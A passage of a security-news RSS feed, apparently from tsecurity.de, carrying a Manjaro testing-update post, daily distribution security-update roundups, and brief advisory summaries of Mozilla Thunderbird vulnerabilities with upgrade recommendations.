<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>
<h2><a name="p-864416-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-864416-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li><strong>linux70</strong> series is now marked EOL</li>
<li><strong>linux-firmware</strong> <a href="https://gitlab.com/kernel-firmware/linux-firmware/-/compare/20260519...20260622?from_project_id=48890189">20260622</a></li>
<li>slight <strong>toolchain</strong> update</li>
<li>we dropped <strong>NVIDIA</strong> driver series 570xx and 575xx</li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.4/releasenotes/">152.0.4</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/en-US/thunderbird/152.0/releasenotes">152.0</a></li>
<li><strong>Virtualbox</strong> <a href="https://www.virtualbox.org/wiki/Changelog-7.2">7.2.12</a></li>
<li><strong>Godot</strong> <a href="https://godotengine.org/releases/4.7/">4.7</a></li>
<li><strong>Pipewire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.7">1.6.7</a></li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.2...v261.1">261.1</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.2.0">1.2.0</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.3/">26.04.3</a></li>
<li><strong>QEmu</strong> <a href="https://www.qemu.org/2026/04/22/qemu-11-0-0/">11.0.2</a></li>
</ul>
<h2><a name="p-864416-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-864416-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.176</li>
<li>linux66 6.6.143</li>
<li>linux612 6.12.94</li>
<li>linux618 6.18.37</li>
<li>linux70 7.0.14</li>
<li>linux71 7.1.2</li>
<li>linux72 7.2.0-rc1</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/4/26 08:10 CEST)</p>
<ul>
<li>testing core x86_64:  89 new and 88 removed package(s)</li>
<li>testing multilib x86_64:  50 new and 50 removed package(s)</li>
<li>testing extra x86_64:  3447 new and 3452 removed package(s)</li>
</ul>
<p><strong>Overlay Changes</strong></p>
<ul>
<li>testing core x86_64:  25 new and 26 removed package(s)</li>
<li>testing multilib x86_64:  6 new and 10 removed package(s)</li>
<li>testing extra x86_64:  260 new and 403 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/0now">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>3 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (389-ds-base, bind9.18, evince, fence-agents, freerdp, frr, frr10, gimp, gnutls, hplip, jmc, mariadb:11.8, mysql:8.4, php:7.4, postgresql-jdbc, postgresql:15, postgresql:16, valkey, xorg-x11-server, and xorg-x11-server-Xwayland), Debian (fastnetmon),...]]></description>
<link>https://tsecurity.de/de/3643620/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643620/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 03 Jul 2026 15:10:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (389-ds-base, bind9.18, evince, fence-agents, freerdp, frr, frr10, gimp, gnutls, hplip, jmc, mariadb:11.8, mysql:8.4, php:7.4, postgresql-jdbc, postgresql:15, postgresql:16, valkey, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Debian</b> (fastnetmon), <b>Fedora</b> (7zip, apptainer, cpp-httplib, mysql8.4, and nmap), <b>Oracle</b> (freerdp, giflib, glib2, glibc, kernel, libreoffice, libvirt, mariadb:10.11, postgresql, python3.11, python3.12, rrdtool, and thunderbird), <b>Red Hat</b> (buildah, podman, and skopeo), <b>SUSE</b> (alloy, apache2, buildah, c3p0, containerd, crun, cups, dhcpcd, dnsmasq, docker-stable, dracut, editorconfig-core-c, ffmpeg-7, fontforge, google-guest-agent, google-osconfig-agent, graphicsmagick, gstreamer-plugins-bad, gstreamer-plugins-good, helm, jackson-annotations, jackson-core, jackson-databind, jline3, kernel, kubectl-cnpg, lcms2, libslirp, libssh2_org, libxreaderdocument3, openbabel, openssl-3, pacemaker, perl-CGI-Session, perl-list-someutils-xs, python-lxml, python-tornado, python-tornado6, python3-onionshare, python311-python-engineio, sg3_utils, thunderbird, transmission, and trivy), and <b>Ubuntu</b> (cifs-utils, kernel, libvncserver, linux-aws-6.8, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm-6.8, linux-nvidia-lowlatency, linux-oracle-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia-tegra, linux-oracle-5.15, linux-raspi, linux-xilinx, nghttp2, nginx, perl, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (giflib, kernel, mariadb:10.11, mod_http2, php, rrdtool, ruby, ruby:3.3, and ruby:4.0), Debian (jq and node-lodash), Fedora (caddy, hut, ipp-usb, kernel, opkssh, rclone, thunderbird, and transmission), SUSE (389-ds, 7zip, alsa, amazon-ecs-init, avahi...]]></description>
<link>https://tsecurity.de/de/3641315/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641315/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 02 Jul 2026 15:24:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (giflib, kernel, mariadb:10.11, mod_http2, php, rrdtool, ruby, ruby:3.3, and ruby:4.0), <b>Debian</b> (jq and node-lodash), <b>Fedora</b> (caddy, hut, ipp-usb, kernel, opkssh, rclone, thunderbird, and transmission), <b>SUSE</b> (389-ds, 7zip, alsa, amazon-ecs-init, avahi, cadvisor, cosign, cups, dnsdist, docker, dracut, firefox, firewalld, giflib, glib-networking, glycin-loaders, google-cloud-sap-agent, google-guest-agent, gsasl, hauler, helm, ImageMagick, kernel, keylime, krb5, libaom, libexif, libgcrypt, libnfs, libssh2_org, loupe, lrzip, mutt, ncurses, nodejs22, openCryptoki, openssh, openssl-3, pacemaker, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-DBI, perl-JavaScript-Minifier-XS, perl-libwww-perl, postfix, python-click, python-idna, python-Markdown, python-joblib, python-handy-archives, python-apache-libcloud, python-WebOb, python-PyGithub, python-soupsieve, python-pip, python-pytest-html, python-python-dotenv, python-python-multipart, python-starlette, python-tornado6, python-zeroconf, python311, python311-jupyter-server, rpcbind, sed, sg3_utils, tar, tiff, and util-linux), and <b>Ubuntu</b> (kernel, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-azure, linux-azure-5.15, linux-azure-fde-5.15, linux-fips, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-realtime, linux, linux-aws, linux-aws-fips, linux-gcp, linux-gcp-fips, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-oracle, linux-realtime, linux-realtime-6.8, linux-oem-6.17, and linux-oem-7.0).]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Mozilla Thunderbird: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird ausnutzen, um einen Denial of Service Angriff durchzuführen, und um falsche Informationen darzustellen.]]></description>
<link>https://tsecurity.de/de/3641019/it-security-nachrichten/neu-mittel-mozilla-thunderbird-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641019/it-security-nachrichten/neu-mittel-mozilla-thunderbird-mehrere-schwachstellen/</guid>
<pubDate>Thu, 02 Jul 2026 13:53:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird ausnutzen, um einen Denial of Service Angriff durchzuführen, und um falsche Informationen darzustellen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Community Office Hours: Thundermail Update]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 0x - Views:3 Welcome to an exciting update about Thundermail, Thunderbird's email service. In this edition, Heather and Monica welcome Sr. Software Engineer Mark Stosberg and Sr. Software Engineer Chris Aquino from the Web Services Team as well as Marketin...]]></description>
<link>https://tsecurity.de/de/3639846/video/community-office-hours-thundermail-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639846/video/community-office-hours-thundermail-update/</guid>
<pubDate>Thu, 02 Jul 2026 00:21:04 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/FS6IcMCJ93s?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Welcome to an exciting update about Thundermail, Thunderbird's email service. In this edition, Heather and Monica welcome Sr. Software Engineer Mark Stosberg and Sr. Software Engineer Chris Aquino from the Web Services Team as well as Marketing Manager Brian Offredi. We’re discussing the recent updates to the Thundermail service. Learn how this product is developing and discover future plans.<br />
<br />
Resources:<br />
Thundermail support: https://support.tb.pro<br />
Thundermail suggestions and ideas: https://ideas.tb.pro/<br />
Thundermail update blogpost: https://blog.thunderbird.net/2026/06/thundermail-june-2026-update-what-we-learned-after-the-first-few-waves-of-invites/<br />
Services roadmap: https://roadmaps.thunderbird.net/en-US/services/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution]]></title>
<description><![CDATA[Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet.Thunderbird is a free, open-source email, calendar, and chat application.Successful exploitation of th...]]></description>
<link>https://tsecurity.de/de/3639590/sicherheitsluecken/multiple-vulnerabilities-in-mozilla-products-could-allow-for-arbitrary-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639590/sicherheitsluecken/multiple-vulnerabilities-in-mozilla-products-could-allow-for-arbitrary-code-execution/</guid>
<pubDate>Wed, 01 Jul 2026 22:06:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. </p><p><br></p><ul><li>Mozilla Firefox is a web browser used to access the Internet.</li><li>Thunderbird is a free, open-source email, calendar, and chat application.</li></ul><p><br></p><p>Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 152.0.1 behebt Fehler bei EWS-Nachrichten]]></title>
<description><![CDATA[Mozilla hat Thunderbird 152.0.1 veröffentlicht. Das Update fällt klein aus und konzentriert sich auf Fehlerbehebungen sowie Sicherheitskorrekturen. Behoben wurde ein Problem, bei dem bei einigen EWS-Nachrichten (Exchange Web Services) mit mehreren Empfängern die Schaltfläche „Allen antworten“ nic...]]></description>
<link>https://tsecurity.de/de/3639345/it-nachrichten/thunderbird-15201-behebt-fehler-bei-ews-nachrichten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639345/it-nachrichten/thunderbird-15201-behebt-fehler-bei-ews-nachrichten/</guid>
<pubDate>Wed, 01 Jul 2026 19:48:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla hat Thunderbird 152.0.1 veröffentlicht. Das Update fällt klein aus und konzentriert sich auf Fehlerbehebungen sowie Sicherheitskorrekturen. Behoben wurde ein Problem, bei dem bei einigen EWS-Nachrichten (Exchange Web Services) mit mehreren Empfängern die Schaltfläche „Allen antworten“ nicht angezeigt wurde. Nutzer...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-152-0-1-behebt-fehler-bei-ews-nachrichten/">Thunderbird 152.0.1 behebt Fehler bei EWS-Nachrichten</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (coreutils, galera and mariadb11.8, giflib, git-lfs, glibc, httpd, kernel, mariadb10.11, mod_md, perl-Archive-Tar, perl-IO-Compress, perl:5.32, rrdtool, ruby, ruby4.0, and thunderbird), Debian (debian-security-support, librabbitmq, and nginx), Fedora...]]></description>
<link>https://tsecurity.de/de/3638677/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638677/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 01 Jul 2026 15:40:11 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (coreutils, galera and mariadb11.8, giflib, git-lfs, glibc, httpd, kernel, mariadb10.11, mod_md, perl-Archive-Tar, perl-IO-Compress, perl:5.32, rrdtool, ruby, ruby4.0, and thunderbird), <b>Debian</b> (debian-security-support, librabbitmq, and nginx), <b>Fedora</b> (chromium, collectd, maradns, python-django-haystack, python-jupytext, varnish, varnish-modules, and vmod-querystring), <b>Oracle</b> (firefox, git-lfs, kernel, nginx:1.24, openssl, perl-Archive-Tar, perl-IO-Compress, and uek-kernel), <b>Red Hat</b> (container-tools:rhel8), <b>SUSE</b> (7zip, apache2, buildah, cifs-utils, curl, docker, exiv2-0_26, libonnxruntime1, libsoup, nodejs22, opensc, pacemaker, perl-Config-IniFiles, podman, sg3_utils, socat, tar, tracker, and xdg-desktop-portal), and <b>Ubuntu</b> (curl, hplip, libgd-perl, libssh2, libyang, ruby2.7, ruby3.0, ruby3.2, ruby3.3, and tar).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11711 | Mozilla Thunderbird up to 143 Javascript Object sensitive data storage in improperly locked memory (Nessus ID 270392 / WID-SEC-2025-2275)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Mozilla Thunderbird up to 143. Affected by this issue is some unknown functionality of the component Javascript Object Handler. The manipulation leads to sensitive data storage in improperly locked memory.

This vulnerability is documente...]]></description>
<link>https://tsecurity.de/de/3638088/sicherheitsluecken/cve-2025-11711-mozilla-thunderbird-up-to-143-javascript-object-sensitive-data-storage-in-improperly-locked-memory-nessus-id-270392-wid-sec-2025-2275/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638088/sicherheitsluecken/cve-2025-11711-mozilla-thunderbird-up-to-143-javascript-object-sensitive-data-storage-in-improperly-locked-memory-nessus-id-270392-wid-sec-2025-2275/</guid>
<pubDate>Wed, 01 Jul 2026 12:09:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a>. Affected by this issue is some unknown functionality of the component <em>Javascript Object Handler</em>. The manipulation leads to sensitive data storage in improperly locked memory.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2025-11711">CVE-2025-11711</a>. The attack can be initiated remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11712 | Mozilla Thunderbird up to 143 OBJECT Tag cross site scripting (Nessus ID 270625 / WID-SEC-2025-2275)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 143. It has been rated as problematic. Affected by this vulnerability is an unknown functionality of the component OBJECT Tag Handler. Performing a manipulation results in cross site scripting.

This vulnerability is identified as CVE-2025-11...]]></description>
<link>https://tsecurity.de/de/3638086/sicherheitsluecken/cve-2025-11712-mozilla-thunderbird-up-to-143-object-tag-cross-site-scripting-nessus-id-270625-wid-sec-2025-2275/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638086/sicherheitsluecken/cve-2025-11712-mozilla-thunderbird-up-to-143-object-tag-cross-site-scripting-nessus-id-270625-wid-sec-2025-2275/</guid>
<pubDate>Wed, 01 Jul 2026 12:09:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>OBJECT Tag Handler</em>. Performing a manipulation results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2025-11712">CVE-2025-11712</a>. The attack can be initiated remotely. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11713 | Mozilla Thunderbird up to 143 on Windows Copy as cURL escape output (EUVD-2025-34201 / Nessus ID 271429)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Mozilla Thunderbird up to 143 on Windows. The impacted element is an unknown function of the component Copy as cURL Handler. This manipulation causes escaping of output.

This vulnerability is registered as CVE-2025-11713. Remote expl...]]></description>
<link>https://tsecurity.de/de/3638084/sicherheitsluecken/cve-2025-11713-mozilla-thunderbird-up-to-143-on-windows-copy-as-curl-escape-output-euvd-2025-34201-nessus-id-271429/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638084/sicherheitsluecken/cve-2025-11713-mozilla-thunderbird-up-to-143-on-windows-copy-as-curl-escape-output-euvd-2025-34201-nessus-id-271429/</guid>
<pubDate>Wed, 01 Jul 2026 12:09:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a> on Windows. The impacted element is an unknown function of the component <em>Copy as cURL Handler</em>. This manipulation causes escaping of output.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2025-11713">CVE-2025-11713</a>. Remote exploitation of the attack is possible. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11714 | Mozilla Thunderbird up to 143 memory corruption (EUVD-2025-34204 / Nessus ID 270392)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Mozilla Thunderbird up to 143. This impacts an unknown function. Performing a manipulation results in memory corruption.

This vulnerability is reported as CVE-2025-11714. The attack is possible to be carried out remotely. No exploit exists....]]></description>
<link>https://tsecurity.de/de/3638082/sicherheitsluecken/cve-2025-11714-mozilla-thunderbird-up-to-143-memory-corruption-euvd-2025-34204-nessus-id-270392/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638082/sicherheitsluecken/cve-2025-11714-mozilla-thunderbird-up-to-143-memory-corruption-euvd-2025-34204-nessus-id-270392/</guid>
<pubDate>Wed, 01 Jul 2026 12:09:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a>. This impacts an unknown function. Performing a manipulation results in memory corruption.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2025-11714">CVE-2025-11714</a>. The attack is possible to be carried out remotely. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11708 | Mozilla Thunderbird up to 143 GetInstance use after free (Nessus ID 270625 / WID-SEC-2025-2275)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Mozilla Thunderbird up to 143. This issue affects the function MediaTrackGraphImpl::GetInstance. This manipulation causes use after free.

This vulnerability is registered as CVE-2025-11708. Remote exploitation of the attack is possible. No ...]]></description>
<link>https://tsecurity.de/de/3638009/sicherheitsluecken/cve-2025-11708-mozilla-thunderbird-up-to-143-getinstance-use-after-free-nessus-id-270625-wid-sec-2025-2275/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638009/sicherheitsluecken/cve-2025-11708-mozilla-thunderbird-up-to-143-getinstance-use-after-free-nessus-id-270625-wid-sec-2025-2275/</guid>
<pubDate>Wed, 01 Jul 2026 11:38:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a>. This issue affects the function <code>MediaTrackGraphImpl::GetInstance</code>. This manipulation causes use after free.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2025-11708">CVE-2025-11708</a>. Remote exploitation of the attack is possible. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11709 | Mozilla Thunderbird up to 143 WebGL Texture out-of-bounds write (Nessus ID 270392 / WID-SEC-2025-2275)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 143 and classified as critical. Impacted is an unknown function of the component WebGL Texture Handler. Executing a manipulation can lead to out-of-bounds write.

The identification of this vulnerability is CVE-2025-11709. The attack may be l...]]></description>
<link>https://tsecurity.de/de/3638008/sicherheitsluecken/cve-2025-11709-mozilla-thunderbird-up-to-143-webgl-texture-out-of-bounds-write-nessus-id-270392-wid-sec-2025-2275/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638008/sicherheitsluecken/cve-2025-11709-mozilla-thunderbird-up-to-143-webgl-texture-out-of-bounds-write-nessus-id-270392-wid-sec-2025-2275/</guid>
<pubDate>Wed, 01 Jul 2026 11:38:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the component <em>WebGL Texture Handler</em>. Executing a manipulation can lead to out-of-bounds write.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2025-11709">CVE-2025-11709</a>. The attack may be launched remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11710 | Mozilla Thunderbird up to 143 IPC Message information disclosure (Nessus ID 270392 / WID-SEC-2025-2275)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Mozilla Thunderbird up to 143. Affected is an unknown function of the component IPC Message Handler. Performing a manipulation results in information disclosure.

This vulnerability is cataloged as CVE-2025-11710. It is possible to in...]]></description>
<link>https://tsecurity.de/de/3638006/sicherheitsluecken/cve-2025-11710-mozilla-thunderbird-up-to-143-ipc-message-information-disclosure-nessus-id-270392-wid-sec-2025-2275/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638006/sicherheitsluecken/cve-2025-11710-mozilla-thunderbird-up-to-143-ipc-message-information-disclosure-nessus-id-270392-wid-sec-2025-2275/</guid>
<pubDate>Wed, 01 Jul 2026 11:38:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 143</a>. Affected is an unknown function of the component <em>IPC Message Handler</em>. Performing a manipulation results in information disclosure.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2025-11710">CVE-2025-11710</a>. It is possible to initiate the attack remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3637466/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637466/unix-server/security-mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Wed, 01 Jul 2026 07:46:24 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-57962 | Mozilla Thunderbird up to 140.12.0/152.0.0 LDAP memory allocation (EUVD-2026-40861)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Mozilla Thunderbird up to 140.12.0/152.0.0. Affected is an unknown function of the component LDAP Handler. Executing a manipulation can lead to uncontrolled memory allocation.

This vulnerability is handled as CVE-2026-57962. The a...]]></description>
<link>https://tsecurity.de/de/3637417/sicherheitsluecken/cve-2026-57962-mozilla-thunderbird-up-to-14012015200-ldap-memory-allocation-euvd-2026-40861/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637417/sicherheitsluecken/cve-2026-57962-mozilla-thunderbird-up-to-14012015200-ldap-memory-allocation-euvd-2026-40861/</guid>
<pubDate>Wed, 01 Jul 2026 07:08:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 140.12.0/152.0.0</a>. Affected is an unknown function of the component <em>LDAP Handler</em>. Executing a manipulation can lead to uncontrolled memory allocation.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-57962">CVE-2026-57962</a>. The attack can be executed remotely. There is not any exploit available.

